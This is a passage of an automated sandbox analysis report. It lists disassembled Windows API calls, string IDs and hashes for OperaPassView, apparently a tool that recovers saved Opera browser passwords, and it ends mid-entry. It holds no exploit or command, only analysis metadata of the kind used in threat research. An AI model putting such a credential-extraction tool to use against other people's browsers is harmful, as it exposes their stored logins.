                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        • Opcode ID: 83da817a605f0bd99ceaa53d5b62a723178d7d847e4a1ec7c31fbbb8bba9ebd5
                                        • Instruction ID: 94c912f6bede647b569eff4abacb5c65d13614e4083452cda4a423de8bec5245
                                        • Opcode Fuzzy Hash: 83da817a605f0bd99ceaa53d5b62a723178d7d847e4a1ec7c31fbbb8bba9ebd5
                                        • Instruction Fuzzy Hash: FC01DFB2604114FFE7142B91DD86E9F7E2DDB04BA2F20443AF602B10D1DAB95F40D69C
                                        APIs
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057AE
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057BC
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057CD
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057E4
                                          • Part of subcall function 004057A2: ??3@YAXPAX@Z.MSVCRT(?,?,?,004059DA), ref: 004057ED
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405A01
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 00405A1D
                                        • memcpy.MSVCRT(?,004100D0,00000014), ref: 00405A42
                                        • memcpy.MSVCRT(?,004100BC,00000014,?,004100D0,00000014), ref: 00405A56
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405AD9
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00405AE3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00405B1B
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        • Opcode ID: bb2dd997502557e4ea6453ce3f07b21e831ae601660291ae351286145656e55e
                                        • Instruction ID: 07a921f86305acd16be1410c6986a741abc6e3f005c63e1355abcfc0754c8aed
                                        • Opcode Fuzzy Hash: bb2dd997502557e4ea6453ce3f07b21e831ae601660291ae351286145656e55e
                                        • Instruction Fuzzy Hash: D0517B71601704AFD724DF29C486B5AB7F4EF88318F10852EE55ADB391DB74A840CF58
                                        APIs
                                        • memcpy.MSVCRT(?,&quot;,0000000C,?,?,00000000,00406A80,?,?), ref: 0040AC28
                                        • memcpy.MSVCRT(?,&amp;,0000000A,?,?,00000000,00406A80,?,?), ref: 0040AC54
                                        • memcpy.MSVCRT(?,&lt;,00000008,?,?,00000000,00406A80,?,?), ref: 0040AC6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 06ec56c56974e0f7b4b17a579e4c19adefe5500bcad0353641c0b1dc6ae569c0
                                        • Instruction ID: 949250bbfba309cc53c0f365b6ccabbe992970ffb619da80f2e731b650733e80
                                        • Opcode Fuzzy Hash: 06ec56c56974e0f7b4b17a579e4c19adefe5500bcad0353641c0b1dc6ae569c0
                                        • Instruction Fuzzy Hash: 9D0100A2E5C320A7FA3120264C86F370204D7A3B55E66053BF982352C1A1BD09B3919F
                                        APIs
                                          • Part of subcall function 00403992: wcslen.MSVCRT ref: 0040399F
                                          • Part of subcall function 00403992: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00406A3F,?,<item>), ref: 004039AE
                                        • wcscat.MSVCRT ref: 00406791
                                        • _snwprintf.MSVCRT ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: FileWrite_snwprintfwcscatwcslen
                                        • String ID: &nbsp;$0k@$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 2451617256-3478536308
                                        • Opcode ID: 136b0e92e8df6b911a7d2d8a739884600bb4179733ca5a60cb8aa89c77b888ba
                                        • Instruction ID: 50620785be2924b2e998c7c2aa8d4364f5b00dbc210d32587abc7bdc2f159a22
                                        • Opcode Fuzzy Hash: 136b0e92e8df6b911a7d2d8a739884600bb4179733ca5a60cb8aa89c77b888ba
                                        • Instruction Fuzzy Hash: 2631AB31900208EFDF04AF54C886EAE7BB5FF04324F1140AAE905BB1E2DB75AA51CB94
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                        • wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 00404ED1: memset.MSVCRT ref: 00404EE4
                                          • Part of subcall function 00404ED1: _itow.MSVCRT ref: 00404EF2
                                        • wcslen.MSVCRT ref: 00404A7E
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                        • LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                        • memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,004049ED,004020A6,OperaPassView), ref: 00404977
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004049ED,004020A6,OperaPassView), ref: 00404995
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049B3
                                          • Part of subcall function 0040493D: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: d8d92a0686d4d5e456feee226b20097165a3bab79b44d90df67e3c631c95ba9f
                                        • Instruction ID: 978925850f83b905d2b4b89a252fc2e9f9ba3081ff0ab66842589351d55622ab
                                        • Opcode Fuzzy Hash: d8d92a0686d4d5e456feee226b20097165a3bab79b44d90df67e3c631c95ba9f
                                        • Instruction Fuzzy Hash: 42419AB5640101FFD714DB59FC90EA6B775EBC8309714823AEB06A72B1DB39A842CB5C
                                        APIs
                                        • memset.MSVCRT ref: 00405168
                                        • GetDlgCtrlID.USER32(?), ref: 00405173
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040518A
                                        • memset.MSVCRT ref: 004051B1
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 004051C8
                                        • _wcsicmp.MSVCRT ref: 004051DA
                                          • Part of subcall function 00405019: memset.MSVCRT ref: 0040502C
                                          • Part of subcall function 00405019: _itow.MSVCRT ref: 0040503A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: 273f307894d1a901c29e0270ddd29645e9960e59c1c9ae06192218f37dbc375b
                                        • Instruction ID: 0296023046db152ed264b92cdfb5494974fd98eae8030e4ac07410237231dc78
                                        • Opcode Fuzzy Hash: 273f307894d1a901c29e0270ddd29645e9960e59c1c9ae06192218f37dbc375b
                                        • Instruction Fuzzy Hash: A211A372800119BAEB20EB91DC89AEF7BACEF04350F0040B6F518E6092EB745A44DB99
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040360E
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403621
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403636
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040364E
                                        • EndDialog.USER32(?,00000002), ref: 0040366A
                                        • EndDialog.USER32(?,00000001), ref: 0040367F
                                          • Part of subcall function 00403325: GetDlgItem.USER32(?,000003E9), ref: 00403332
                                          • Part of subcall function 00403325: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403347
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00403697
                                        • SetDlgItemInt.USER32(0000009B,000003ED,?,00000000), ref: 004037A3
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Item$Dialog$MessageSend
                                        • String ID:
                                        • API String ID: 3975816621-0
                                        • Opcode ID: 26c85d0074bae9d10ab68ded3bf59835fabe5f402c7936a152d4b2f9fcfa4426
                                        • Instruction ID: 12236749957bbde37ae72390c5e53f70cf41314f2f2f6dfb3ec25344756da973
                                        • Opcode Fuzzy Hash: 26c85d0074bae9d10ab68ded3bf59835fabe5f402c7936a152d4b2f9fcfa4426
                                        • Instruction Fuzzy Hash: B361E470100A01BFDB31AF25C886A1ABBA8EF44315F00C53EF915A77E1D779EA91CB49
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004037C3
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004037DF
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00403805
                                        • memset.MSVCRT ref: 00403815
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00403844
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00403891
                                        • SetFocus.USER32(?,?,?,?), ref: 0040389A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004038AA
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 03ce0126af2e166a49035f109e5b9b371e627cad62393e3c1ce19d5379043738
                                        • Instruction ID: a94385e8c78de924cee77f368874fbad43a9d8de2ae7ea267fe0a8e67a2869b7
                                        • Opcode Fuzzy Hash: 03ce0126af2e166a49035f109e5b9b371e627cad62393e3c1ce19d5379043738
                                        • Instruction Fuzzy Hash: 1331A4B2900605AFDB14AF29C88591AFBE8FF44354B00CA3FF519E7691D778ED408B98
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004079ED
                                        • GetWindowRect.USER32(?,?), ref: 00407A03
                                        • GetWindowRect.USER32(?,?), ref: 00407A16
                                        • BeginDeferWindowPos.USER32(00000003), ref: 00407A33
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 00407A50
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 00407A70
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 00407A97
                                        • EndDeferWindowPos.USER32(?), ref: 00407AA0
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                         • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: dae75a277170d538d4aadf7f93f54a33f7291817a4ebdf1889a4639404ac1ddf
                                        • Instruction ID: e4f78f3829a74d2a8d6fc1eee99c52144a6f2d081558712967551c55d100aa1b
                                        • Opcode Fuzzy Hash: dae75a277170d538d4aadf7f93f54a33f7291817a4ebdf1889a4639404ac1ddf
                                        • Instruction Fuzzy Hash: 2921A472A40209FFEB119FA8CE89FEEBBB9FB48300F104164FA55B6161C73169559F24
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 0040B292
                                        • _wcsicmp.MSVCRT ref: 0040B2A7
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AA3
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AAD
                                          • Part of subcall function 00403A94: _memicmp.MSVCRT ref: 00403AC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcslen$_memicmp
                                        • String ID: .save$http://$https://$log profile$signIn
                                        • API String ID: 1428608950-2708368587
                                        • Opcode ID: 802a3b1c96b8a1692ab2faeed1ea34f8d6feca5b72e74921201663452091f673
                                        • Instruction ID: aebae70456654339f84af78ccd11eee7a693882df7f645b401ad4cefe5663bbc
                                        • Opcode Fuzzy Hash: 802a3b1c96b8a1692ab2faeed1ea34f8d6feca5b72e74921201663452091f673
                                        • Instruction Fuzzy Hash: 63413A71500305CADB349A69C4097ABB7E8DB04319F30887FE866F36C1DB7CA9419A9D
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403408
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00403421
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 0040342E
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0040343A
                                        • memset.MSVCRT ref: 0040349E
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 004034D3
                                        • SetFocus.USER32(?), ref: 00403559
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: fc0645fcad6935a50dda920a1aace060dab3b66a03edc3faef74037774e53fb0
                                        • Instruction ID: 20cdf0d6c318418226ee98135bf92e64c1e6f3741e613206d3032fbef3e3ddd3
                                        • Opcode Fuzzy Hash: fc0645fcad6935a50dda920a1aace060dab3b66a03edc3faef74037774e53fb0
                                        • Instruction Fuzzy Hash: 0F414971D00219BBDB209F95CC89DAFBF79EF08755F00806AF908B6291D7749A80CFA4
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 00405229
                                          • Part of subcall function 00405052: GetMenuItemCount.USER32(?), ref: 00405068
                                          • Part of subcall function 00405052: memset.MSVCRT ref: 00405087
                                          • Part of subcall function 00405052: GetMenuItemInfoW.USER32 ref: 004050C3
                                          • Part of subcall function 00405052: wcschr.MSVCRT ref: 004050DB
                                        • DestroyMenu.USER32(00000000), ref: 00405247
                                        • CreateDialogParamW.USER32(?,?,00000000,004051FD,00000000), ref: 00405295
                                        • memset.MSVCRT ref: 004052B1
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 004052C6
                                          • Part of subcall function 00404E81: _snwprintf.MSVCRT ref: 00404EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: 149c361682219c7e34215e06fcc554497841175788682e13768cb0a330dcec1d
                                        • Instruction ID: 9453a059592ad42c78b6b37bd85bce73a5cacd14e9a23cb9a166f4fbe1604a1c
                                        • Opcode Fuzzy Hash: 149c361682219c7e34215e06fcc554497841175788682e13768cb0a330dcec1d
                                        • Instruction Fuzzy Hash: 8021E272900214ABDB21AF50EC89EAF3B68FF05760F0044BEF905B50E1D7788991DF99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: 5f83e7dfff2683fd3da09f41f906c5c49763c21eea20386180a339c445556ac6
                                        • Instruction ID: 538c7a170678a2969158565ed220208d763336d8b4b0833da97998c4ee0265a7
                                        • Opcode Fuzzy Hash: 5f83e7dfff2683fd3da09f41f906c5c49763c21eea20386180a339c445556ac6
                                        • Instruction Fuzzy Hash: 4721DE32914304ABC7209F51D845A9FB7A8FF88754F000A3FF684A6281E77A9940CBDE
                                        APIs
                                          • Part of subcall function 00407384: SendMessageW.USER32(?,0000000B,?,00000000), ref: 00407392
                                          • Part of subcall function 004038B4: LoadCursorW.USER32(00000000,00007F02), ref: 004038BB
                                          • Part of subcall function 004038B4: SetCursor.USER32(00000000), ref: 004038C2
                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00407840
                                          • Part of subcall function 00407769: _snwprintf.MSVCRT ref: 00407796
                                          • Part of subcall function 00407769: _snwprintf.MSVCRT ref: 004077C1
                                          • Part of subcall function 00407769: wcscat.MSVCRT ref: 004077D4
                                          • Part of subcall function 00407769: SendMessageW.USER32(?,0000040B,00000000,?), ref: 004077FB
                                          • Part of subcall function 004038CE: SetCursor.USER32(00406EB4), ref: 004038D4
                                          • Part of subcall function 004058AB: SetFocus.USER32(?,00407873), ref: 004058B1
                                        • memset.MSVCRT ref: 004078A2
                                        • _snwprintf.MSVCRT ref: 004078BE
                                        • SetWindowTextW.USER32(?,OperaPassView), ref: 004078DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: CursorMessageSend_snwprintf$FocusLoadTextWindowmemsetwcscat
                                        • String ID: %s - %s$OperaPassView
                                        • API String ID: 2853318093-1794996424
                                        • Opcode ID: 89465e328d0f591701b4b77d1b23a1bdeb4b2612a6e07a3e464c47ad0c26e3b1
                                        • Instruction ID: b1892371dd2e9f65290bc5ed040e2386b43b7ae8db8c37b5a9f578916e593a1d
                                        • Opcode Fuzzy Hash: 89465e328d0f591701b4b77d1b23a1bdeb4b2612a6e07a3e464c47ad0c26e3b1
                                        • Instruction Fuzzy Hash: 30216F31900205AFE310FB65CC85F96B7EDEF44308F0044B9B559A75D1CB7978558B55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmp
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: b1f95c932e24bcdfe99f188a17c3828b4f660331acecbfbb3d7642938c25ebb1
                                        • Instruction ID: daaebc757af128cb663d588b12b0cbc29fe2586e7ab738a320fc69d6085252d8
                                        • Opcode Fuzzy Hash: b1f95c932e24bcdfe99f188a17c3828b4f660331acecbfbb3d7642938c25ebb1
                                        • Instruction Fuzzy Hash: FB01F5B2E0431866E720A6519C4BBBA33ACEB80B14F10007FFD14B90C2EB7D994846CD
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004031CA
                                        • GetWindow.USER32(?,00000005), ref: 004031E2
                                        • GetWindow.USER32(00000000), ref: 004031E5
                                          • Part of subcall function 00401584: GetWindowRect.USER32(?,?), ref: 00401593
                                          • Part of subcall function 00401584: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015AE
                                        • GetWindow.USER32(00000000,00000002), ref: 004031F1
                                        • GetDlgItem.USER32(?,000003EE), ref: 00403208
                                        • GetDlgItem.USER32(?,000003EE), ref: 00403216
                                        • SetFocus.USER32(00000000), ref: 00403219
                                        Memory Dump Source
